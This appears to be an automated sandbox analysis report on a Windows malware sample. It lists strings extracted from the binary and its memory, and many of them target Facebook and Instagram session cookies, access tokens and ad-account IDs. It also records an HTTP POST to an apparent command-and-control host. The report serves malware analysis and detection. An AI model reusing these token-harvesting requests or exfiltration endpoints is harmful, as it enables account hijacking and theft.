text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: c8dd8ae6dc4dc644.xyz
Source: unknown | HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: c8dd8ae6dc4dc644.xyz
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/ddd
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/r
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364144645.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.e
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmp | String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: http://clients2.google.com/service/update2/crxx
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: MiniThunderPlatform.exe.3.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: http://docs.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: http://drive.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0:
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0B
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0E
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0F
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0K
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0M
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0P
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0R
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.msocsp.com0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: MiniThunderPlatform.exe.3.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.3.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.3.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
